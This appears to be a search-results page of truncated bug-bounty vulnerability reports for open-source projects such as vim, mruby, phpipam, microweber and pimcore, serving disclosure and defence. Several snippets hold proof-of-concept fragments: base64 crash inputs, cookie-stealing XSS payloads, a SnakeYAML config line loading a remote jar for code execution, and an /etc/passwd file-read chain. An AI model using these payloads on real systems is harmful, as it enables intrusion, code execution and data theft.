4072 matches found
Improper Access Control in liukuo362573/yishaadmin
Description https://www.github.com/liukuo362573/yishaadmin has an endpoint "/admin/File/UploadFile" that allows uploading files without authentication. Root-cause Server doesn't check user's permission when attacker access the endpoint. After that, server will directly call UploadFile function wi...
None in radareorg/radare2
Description Use After Free occurs in riobankmapaddtop. commit : 4d75eeb99a0d913e9b443e7aaf73aa44a323739d Proof of Concept $ echo -ne "VlowMFcwMOEwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwEDAw MDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAw...
Heap-based Buffer Overflow in mruby/mruby
Description Heap Overflow occurs in mrbfsend. commit : d912b864df3199f2108601a0451532c587a5e830 Proof of Concept $ echo -ne "c2VuZCJzZW5kIiwic2VuZCIsInNlbmQiLCJzZW5kIiwic2VuZCIsInNlbmQiLCJzZW5kIiwic2Vu ZCIsInNlbmQiLCJzZW5kIiwic2VuZCIsInNlbmQiLCJzZW5kIiwic2VuZCIsInNlbmQiLCJzZW5k IgAAAAo=" | base64...
Cross-site Scripting (XSS) - Stored in chatwoot/chatwoot
Description In order to render raw HTML in Vue.js you may use v-html attribute, which opens a door for XSS in case of malicious input. Chatwoot actually uses it in several places, such as...
Cross-site Scripting (XSS) - Reflected in phoronix-test-suite/phoronix-test-suite
Description Hi, i found a Reflected XSS vulnerability POST based XSS + no CSRF token in phoronix test suite, Results tab. Proof of Concept Install a local instance of phoronix create a Search results form like this: // PoC.html history.pushState'', '', '/' document.forms0.submit; // and send to...
Cross-site Scripting (XSS) - Stored in microweber/microweber
Description There is a reflected XSS in creating and searching tag function . where any user can execute any malicious code results in the cookie stealing or Account takeover vulnerability Steps to Produce: Go to this particular URL URL Click on live edit , Now In the tag section and select the...
in vim/vim
Description Using out of range pointer offset occurs in enterbuffer. commit : b247e0622ef16b7819f5dadefd3e3f0a803b4021 This case is created to correct the previous issue. Proof of Concept $ echo -ne "ZnUgUigpCnRhYjBsb3AKZTAKbGYKZW5kZgpjYWwgUigpCm5vcm0XFjAKY2FsIFIoKQpidw==" | base64 -d mpoc Valgri...
Cross-site Scripting (XSS) - Stored in ptrofimov/beanstalk_console
Description Stored XSS in parameter 'host' when add server Proof of Concept // PoC.req GET / HTTP/1.1 Host: 127.0.0.1:8088 User-Agent: Mozilla/5.0 Macintosh; Intel Mac OS X 10.15; rv:97.0 Gecko/20100101 Firefox/97.0 Accept:...
in mruby/mruby
Description commit 4e8ab145da52c3cfb0bd4b823df8041dcc52f454 Author: Yukihiro "Matz" Matsumoto Date: Tue Feb 8 13:03:51 2022 +0900 Proof of Concept sh $ echo -ne "e30KWyoqMCxtOjBdBHM9MDYudGl0ZXN7My7+////c3slXSN7W11lYWsKYj17fQpbKiowLG06MF3/...
Cross-site Scripting (XSS) - Reflected in effgarces/bookedscheduler
Setup the Booked Scheduler locally.URL like the following. http://192.168.5.5/phpsch/ Attcker 2. Login as valid user. 3. Make an reservation from the dashboard. 4. Open the information you reserved.URL like the following http://192.168.5.5/Web/reservation.php?rn=62020af2eee4d833634703 5. The...
Improper Access Control in liukuo362573/yishaadmin
Description https://www.github.com/liukuo362573/yishaadmin has an endpoint "/admin/File/DeleteFile" that allows deleting files without authentication. Root-cause Server doesn't check user's permission when attacker access the endpoint. After that, server will directly call delete function with th...
Path Traversal in liukuo362573/yishaadmin
Description https://www.github.com/liukuo362573/yishaadmin has an endpoint "/admin/File/DownloadFile" that allows downloading/deleting files without authentication. In addition, this endpoint has path traversal vulnerability that allows arbitrary file read/delete. Proof of Concept - using BurpSui...
Exposure of Sensitive Information to an Unauthorized Actor in follow-redirects/follow-redirects
Note Reclarification of https://huntr.dev/bounties/6d9fd2bf-39e4-4291-b228-30f131b9ccdc/ Description The Authorization header leaks from same hostname https-http redirect. If https://example.com redirects to http://example.com, then an attacker who can listen in on the wire or perform a MITM atta...
Cross-site Scripting (XSS) - Stored in pimcore/pimcore
Description The pimcore/pimcore package is an open source platform that provides PIM, MDM, CDP, DAM, DXP/CMS & Digital Commerce services. stored xss vulnerability occurs when you change the value of Abbreviation, Longname, Converter Service at "Settings" = "Data Objects" = "Quantity Value" in the...
Cross-site Scripting (XSS) - Stored in pimcore/pimcore
Description Cross site scripting vulnerability in pimcore,pimcore field, it is fixed in this commit 832c34 , but still it is executing xss .Icon field in events and news Proof of Concept 1 . Login to the demo account https://10.x-dev.pimcore.fun/admin/ 2. Go to settings --data objects -- classes ...
Exposure of Sensitive Information to an Unauthorized Actor in eventsource/eventsource
Exposure of Sensitive Information to an Unauthorized Actor in EventSource/eventsource Reported on Feb 6th 2022 | Timothee Desurmont Vulnerability type: CWE-200 Bug Cookies & Authorisation headers are leaked to external sites. Description When fetching an url with a link to an external site...
in clasp-developers/clasp
Description Clasp uses printf to log errors and useful information, in one instance of this logging - the printf call specifies format operators but lacks the appropriate arguments - leading to unrelated bytes being included in the output. Impact This vulnerability is capable of allowing an...
Server-Side Request Forgery (SSRF) in chocobozzz/peertube
Description First of all, Thanks to my friend Haxatron for his excellent report I read the fix commit, and I found out that the code only Checked the IP addresses and didn't check the domain names that refer to a private IP address Steps to reproduce first, set up a local server at 127.0.0.2:8000...
OS Command Injection in microweber/microweber
Description OS command injection also known as shell injection is a web security vulnerability that allows an attacker to execute arbitrary operating system OS commands on the server that is running an application, and typically fully compromise the application and all its data. Very often, an...
Cross-site Scripting (XSS) - Stored in livehelperchat/livehelperchat
Description LiveHelperChat is vulnerable to Stored XSS at the Message field in the Personal canned message tab of the User account page. Payload constructor.constructor'alert1' Steps to reproduce 1.Login then go to User account page https://demo.livehelperchat.com/siteadmin/user/account 2.Switch ...
Cross-site Scripting (XSS) - DOM in hakimel/reveal.js
Description The onmessage event listener in /plugin/notes/speaker-view.html does not check the origin of postMessage before adding the content to the webpage. The vulnerable code allows any origin to postMessage on the browser window and feeds attacker's input to parts using which attacker can...
Exposure of Sensitive Information to an Unauthorized Actor in cjferna/photo-services-mashup
Description Please enter a description of the vulnerability. Vulnerable URL: https://github.com/cjferna/Photo-Services-Mashup/blob/fdc12e0671e035bac00cc46ee67d456540444460/src/es/um/taw/rest/imagga/Imagga.java It contains sensitive API Keys and secret keys. Proof of Concept private final String U...
Cross-site Scripting (XSS) - Reflected in phpipam/phpipam
Description Cross-Site Scripting vulnerability which allows attackers to execute arbitrary javascript code in the browser of a victim which affected import Data set feature via a spreadSheet file upload. Proof of Concept Endpoint 1 POST http://HOST/app/admin/import-export/import-vlan-preview.php ...
in phpipam/phpipam
Description The phpIPAM 1.4.5 incorrectly assigns a privilege to a particular actor, creating an unintended sphere of control for that actor in the Import/Export feature. A normal user with the role of User could download XLS file of IP addresses, hostfile dump and export system database that...
in vim/vim
Description Floating point error in tabstopfromto. commit : 7676c158798a7c90f500cab2c12af0d47bad6026 Proof of Concept $ echo -ne "bm9ybTBvMDD/MDAwMDAwMDAwMDAwMDAwMDAwMApzaWwhbm9ybRZjMDAwCQpmdSBSZXRhYihnLG4p Cm8KZXhlInJldCJhOm4KZW5kZgpjYWwgbCgiIixSZXRhYigwLDQpCnNlIHRhYnN0b3A9NTAwMDAw...
Cross-site Scripting (XSS) - Stored in bytebase/bytebase
Description Hello there, there is a stored XSS in bytebase SQL editor. Proof of Concept 1. Install bytebase on your system. 2. Go to /sql-editor and create a new query with name 3. Go back to the /sql-editor and go to Queries tab and see that a pop up appears, indicating the XSS payload is...
Exposure of Sensitive Information to an Unauthorized Actor in transloadit/uppy
Description First thanks to my friend Haxatron for this awsome report I review the @uppy/companion code from the source to the sink, and I figure out a significant issue that makes any SSRF protection Effectless. I put myself as a Developer and started to read the companion document, and then I s...
in luigirizzo/netmap
Description In the Netmap source code, calls to DbgPrint; can be found to contain a formatting argument %p to be specific yet no argument, this would in most cases lead to nearby data being printed to the debug stream. Impact This vulnerability is capable of allowing an attacker to read data from...
Cross-site Scripting (XSS) - Stored in alanaktion/phproject
Description Stored Cross-Site Scripting XSS vulnerability due to the lack of content validation and output encoding. Then, the vulnerability can be triggered when the user previews the document´s content. Proof of Concept login and navigate task Dependencies This task depends on: This task is a...
Improper Authorization in phpipam/phpipam
Description In phpIPAM 1.4.5, a normal user with the role of Usercould view/read the log files via show-logs.php, errorlogs.php and accesslogs.php endpoints. It is supposedly accessible by the Administrator only. Proof of Concept Tested version: phpIPAM 1.4.5 Affected endpoints: 1 GET/POST...
in mruby/mruby
Description OOB read and OOB write in mrbarypush. commit : 903c5f978a2966465d8d5c6dfac55a977d134287 Proof of Concept bash $ echo -ne "bAticjWSUkRPTkxZC2I9e30MWyohMCxtOjAwLG06MF09MXxbKiEwLG0wXQo=" |base64 -d poc ASAN $ ./bin/mruby ./poc AddressSanitizer:DEADLYSIGNAL...
Improper Access Control in mautic/mautic
Description I couldn't find a suitable vulnerability type for this kind of issue, so this may be incorrect the default .htaccess file has some restrictions in the access to PHP files. Deny access via HTTP requests to all PHP files. Order deny,allow Deny from all ... Except those whitelisted bello...
Business Logic Errors in publify/publify
Description It was found that if a user tries to create an article, and want to make that article private, the functionality is not working. Proof of Concept 1. Create an article 2. Click on publish and you will see the option to visibility to make it private, but functionality is not designed...
Improper Access Control in phpipam/phpipam
Description In phpIPAM 1.4.5, a normal user with the role of User could download or export IP subnets that may contain sensitive information related data such as IP address, IP state, MAC, owner, hostname and device via export-subnet.php endpoint. The bug is the export-subnet.php should verify th...
in cortezaproject/corteza-server
Description During testing it was found that if a user revoke his all active session, then also user is able to make changes to his account. Proof of Concept 1. Log in to the application 2. Go to profilelogin sessions and revoke all sessions. 3. You will see that all other sessions are still vali...
Cross-site Scripting (XSS) - Stored in s-cart/s-cart
Description Stored XSS in S-Cart Version 6.8.3 affecting Product and Category module. Proof of Concept Product version: S-Cart Version 6.8.3 core 6.8.10 , https://github.com/s-cart/s-cart/releases/tag/v6.8.3 Vulnerability 1: Stored XSS In Product module 1 Endpoint: POST...
the function deepFromFlat of underscore.deep is vulnerable to prototype pollution
Prototype Pollution in Clever/underscore.deep Reported on Feb 2nd 2022 | Timothee Desurmont Description Vulnerability type: CWE-1321 Version 0.5.1 of underscore.deep is vulnerable to prototype pollution; the function deepFromFlat in underscore.deep.js do not check if the attribute resolves to the...
Improper Authorization in bytebase/bytebase
Description Hello bytebase team, there is an improper privilege management in bytebase source code. This allows a user to view another user inbox. Proof of Concept 1. Install bytebase, create new user user1and user2 2. Login as user1, go to this link /api/inbox?user=user-id and change user-id to ...
in gpac/gpac
Description Null Pointer Dereference in afrtboxread Proof of Concept echo AAAAEW1ldGFzXSAAAABkaXIAAAAAYWZydHRzdnB5dG/oAwBtAGwAAm0= | base64 -d poc gdb output bash pwndbg r -bt poc Starting program: /run/shm/gpac/bin/gcc/MP4Box -bt poc ERROR: Could not find ELF base! Thread debugging using...
in mruby/mruby
Description There is a NULL Pointer Dereference in ivfree src/variable.c:232:20. This bug has been found on mruby lastest commit hash 00f2b74ab2c1f03084908c815dcd0934f9fc702a on Ubuntu 20.04 for x8664/amd64. Proof of Concept 3.timese=0," =c= y:0,0 0" Steps to reproduce 1- Clone repo and build wit...
Command Injection in ibotpeaches/apktool
Description Arbitrary code execution when an APK is built with a malicious apktool.yml due to SnakeYAML's load function Proof of Concept 1: Modify apktool.yml somevar: !!javax.script.ScriptEngineManager !!java.net.URLClassLoader !!java.net.URL "http://127.0.0.1:8000/yaml-payload.jar" 2: Download...
in gpac/gpac
Description Null Pointer Dereference in gitnboxdel Proof of Concept bash echo -n AAAAEW1ldGEwMDAwMDAwMDAAAABjMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAAAAARZ2l0bjAwMDAwMDAwMA== | base64 -d poc ./MP4Box -bt ./poc...
None in vim/vim
Description Use After Free in enterbuffer function. commit : 5703310e640c4b142a16a3ea4f45317565ae8c32 Proof of Concept bash $ echo -ne "ZnUgUigpCiAgdGFiIGxvcAogIGxldCBsOj1nCiAgZQEKbGYKZW5kZgoKY2FsIGFzYWwoIiIsUigp KQpjYWwgYXNhbCgiIixSKCkpCmNhbCBhc2FsKCIiLFIoKSkKYnchCg==" | base64 -d poc ASAN $...
Cross-site Scripting (XSS) - Reflected in ptrofimov/beanstalk_console
Description Beanstalk Console is vulnerable to reflected Cross-Site Scripting via the server parameter. Steps to reproduce 1. Setup the Beanstalk console locally. 2. Go to https://localhost/public/? and add a random server. 3. Visit...
in alextselegidis/easyappointments
Description The software is a booking management system that has a public form to place bookings, and a private area for the calendar and management of services, users, settings, etc... There is a backend API that allows data manipulation, including listing the appointments for a specific time...
Cross-site Scripting (XSS) - Reflected in navigatecms/navigate-cms
Description Cross-Site Scripting is vulnerability which allows attackers to execute arbitrary javascript code in the browser of victim. Proof of Concept Parameter: id Payload: alertdocument.cookie Affected endpoints: On Firefox browser, visit: 1...
Cross-site Scripting (XSS) - Stored in s-cart/core
Description Multiple Stored XSS exists in S-Cart Version 6.8.4 and below leads to cookie stealing of any victim that visits the affected URL. This vulnerability has the potential to steal a user's cookie and gain unauthorized access to that user's account through the stolen cookie. Proof of Conce...
Improper Privilege Management in liangliangyy/djangoblog
Description Hi there, I would like to report an improper privilege management vulnerability in djangoblog source code. This would allow an attacker to create comment on behalf of anyone. Proof of Concept 1. Install a local instance of djangoblog, login as admin and create an article 2. Create a n...
Cross-site Scripting (XSS) - Stored in liangliangyy/djangoblog
Description Hi there, I would like to report a stored Cross Site Scripting vulnerability in djangoblog source code. Cross-site scripting also known as XSS is a web security vulnerability that allows an attacker to compromise the interactions that users have with a vulnerable application. It allow...
in microweber/microweber
Description In the Microweber CMS, there are two endpoints that can be used together to get local file inclusion vulnerability. 1. /api/BackupV2/upload?src=/etc/passwd 2. /api/BackupV2/download?file=passwd When logged in as administrator, we can upload any readable file from the operating system...